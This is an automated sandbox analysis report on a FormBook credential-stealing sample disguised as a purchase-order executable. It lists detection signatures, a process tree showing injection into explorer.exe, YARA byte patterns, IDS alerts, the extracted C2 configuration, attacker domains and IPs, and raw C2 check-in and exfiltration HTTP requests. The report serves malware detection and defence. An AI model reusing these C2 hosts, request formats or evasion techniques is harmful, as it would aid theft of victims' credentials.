Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New PO-RJ-IN-003 - Knauf Queimados.exe

Overview

General Information

Sample Name:New PO-RJ-IN-003 - Knauf Queimados.exe
Analysis ID:755933
MD5:244fc9610f75225aa3dc09958195beb1
SHA1:ef0d6103d27090fc9d25e3ef3de2e1b6d9670d9c
SHA256:05cdda3567b913d99627f8e41336404d5830816df65e1001d6b2ad05bd9ed18d
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • New PO-RJ-IN-003 - Knauf Queimados.exe (PID: 748 cmdline: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe MD5: 244FC9610F75225AA3DC09958195BEB1)
    • jaxdij.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)
      • jaxdij.exe (PID: 5360 cmdline: "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rubthqnwyfue.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)
            • WerFault.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • rubthqnwyfue.exe (PID: 6040 cmdline: "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)
            • WerFault.exe (PID: 5420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • rundll32.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spirituallyzen.com/m9ae/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac71:$sqlite3step: 68 34 1C 7B E1
    • 0x1a13b:$sqlite3text: 68 38 2A 90 C5
    • 0x1acb6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a152:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.jaxdij.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.jaxdij.exe.400000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x7d38:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x207c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbfe6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1951e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.jaxdij.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1931c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18dc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1941e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19596:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xbbb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18013:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1f52e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20531:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.jaxdij.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1b830:$sqlite3step: 68 34 1C 7B E1
        • 0x1c3a8:$sqlite3step: 68 34 1C 7B E1
        • 0x1b872:$sqlite3text: 68 38 2A 90 C5
        • 0x1c3ed:$sqlite3text: 68 38 2A 90 C5
        • 0x1b889:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1c403:$sqlite3blob: 68 53 D8 7F 8C
        2.2.jaxdij.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.593.179.127.2749736802031449 11/29/22-10:35:37.226497
          SID:2031449
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5107.148.15.8149749802031453 11/29/22-10:36:16.701501
          SID:2031453
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5107.148.15.8149749802031412 11/29/22-10:36:16.701501
          SID:2031412
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.593.179.127.2749736802031453 11/29/22-10:35:37.226497
          SID:2031453
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5107.148.15.8149749802031449 11/29/22-10:36:16.701501
          SID:2031449
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.593.179.127.2749736802031412 11/29/22-10:35:37.226497
          SID:2031412
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeReversingLabs: Detection: 27%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeReversingLabs: Detection: 12%
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeJoe Sandbox ML: detected
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spirituallyzen.com/m9ae/"]}
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jaxdij.exe, 00000001.00000003.304952099.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000001.00000003.305442147.0000000002D20000.00000004.00001000.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418718390.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.308889857.0000000000F6D000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000003.310322417.0000000001101000.00000004.00000800.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.419932774.00000000013BF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.822319610.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.418994755.000000000452C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.416346932.000000000438A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.823052893.00000000047DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: jaxdij.exe, 00000002.00000002.417087880.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, jaxdij.exe, 00000002.00000002.418036056.0000000001280000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002552D3 FindFirstFileExW,1_2_002552D3
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00255387
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002552D3 FindFirstFileExW,2_2_002552D3
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00255387 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00255387

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.publickit.website
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.65 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dailyheraldresearch.com
          Source: C:\Windows\explorer.exeDomain query: www.ybkos.link
          Source: C:\Windows\explorer.exeDomain query: www.tommy57.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 38.40.166.195 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.233.121.61 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oonrreward.xyz
          Source: C:\Windows\explorer.exeDomain query: www.frwqc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 178.208.83.20 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.214.243 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.121.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lee-perez.com
          Source: C:\Windows\explorer.exeNetwork Connect: 206.83.40.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.15.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.davidemarone.com
          Source: C:\Windows\explorer.exeDomain query: www.porggiret.site
          Source: C:\Windows\explorer.exeNetwork Connect: 93.179.127.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.111.12.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bookmygennie.com
          Source: C:\Windows\explorer.exeDomain query: www.gmrsnodes.com
          Source: C:\Windows\explorer.exeDomain query: www.new-thinking.digital
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.90.105 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobewell.store
          Source: C:\Windows\explorer.exeDomain query: www.700544.com
          Source: C:\Windows\explorer.exeDomain query: www.amspustaka.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 38.163.214.169 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.spirituallyzen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.40.34.41 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.oonrreward.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.spirituallyzen.com/m9ae/
          Source: Joe Sandbox ViewASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.gmrsnodes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.dailyheraldresearch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.publickit.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.lee-perez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.frwqc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tommy57.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.700544.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.porggiret.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tobewell.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.new-thinking.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.ybkos.linkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.bookmygennie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.amspustaka.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.spirituallyzen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 62.233.121.61 62.233.121.61
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.gmrsnodes.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.gmrsnodes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gmrsnodes.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 72 79 74 59 37 68 71 32 6b 38 49 32 45 58 35 31 74 73 44 36 7e 30 75 53 52 72 4c 79 7a 30 54 75 34 6d 46 4c 76 76 77 49 7e 78 6b 7a 68 45 64 65 4a 70 4a 66 6d 36 65 52 64 30 33 53 68 47 65 6c 31 45 66 54 33 76 6a 38 45 72 46 7a 42 30 53 55 32 6e 65 33 38 51 4c 57 6f 56 49 4b 7e 46 4e 73 35 58 51 78 4a 5f 6e 66 7e 63 75 52 28 4e 63 54 4a 2d 54 4f 7a 47 4b 44 58 64 73 2d 54 39 72 4a 67 64 76 33 4b 7a 72 51 58 72 50 69 5a 32 7e 64 73 42 33 54 69 5a 36 58 4d 42 50 6f 64 4a 4d 39 59 79 77 31 36 48 77 71 6c 6b 4e 32 58 48 6a 6f 68 79 72 76 33 4e 62 61 6e 50 48 68 65 42 6b 72 46 7a 70 53 6a 51 49 78 57 42 43 76 53 30 4d 6d 78 6f 41 77 48 41 32 47 4a 72 54 70 76 70 4b 51 58 44 72 54 67 30 58 56 33 6b 37 58 6f 6b 50 69 43 73 48 6b 54 73 6b 4d 6f 49 38 36 61 59 72 54 32 61 31 73 6a 54 61 65 4a 52 47 6b 4d 6d 76 31 51 58 6d 62 52 67 64 62 62 61 65 55 6b 74 6c 58 30 61 66 64 38 6e 53 57 5a 6d 77 55 47 6d 51 33 6c 41 48 4a 57 37 7a 72 64 4c 37 47 61 43 4f 71 71 5f 5a 44 31 70 6d 70 37 5f 73 63 61 66 50 39 66 5a 38 47 59 4e 35 48 48 48 47 36 56 62 61 2d 77 71 78 53 30 47 55 66 66 31 64 48 37 76 4c 35 70 68 33 78 6c 4a 53 4c 5a 4d 34 4a 5a 75 33 38 69 37 4e 69 6c 36 70 67 48 39 46 6e 30 35 33 33 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=rytY7hq2k8I2EX51tsD6~0uSRrLyz0Tu4mFLvvwI~xkzhEdeJpJfm6eRd03ShGel1EfT3vj8ErFzB0SU2ne38QLWoVIK~FNs5XQxJ_nf~cuR(NcTJ-TOzGKDXds-T9rJgdv3KzrQXrPiZ2~dsB3TiZ6XMBPodJM9Yyw16HwqlkN2XHjohyrv3NbanPHheBkrFzpSjQIxWBCvS0MmxoAwHA2GJrTpvpKQXDrTg0XV3k7XokPiCsHkTskMoI86aYrT2a1sjTaeJRGkMmv1QXmbRgdbbaeUktlX0afd8nSWZmwUGmQ3lAHJW7zrdL7GaCOqq_ZD1pmp7_scafP9fZ8GYN5HHHG6Vba-wqxS0GUff1dH7vL5ph3xlJSLZM4JZu38i7Nil6pgH9Fn0533cQ).
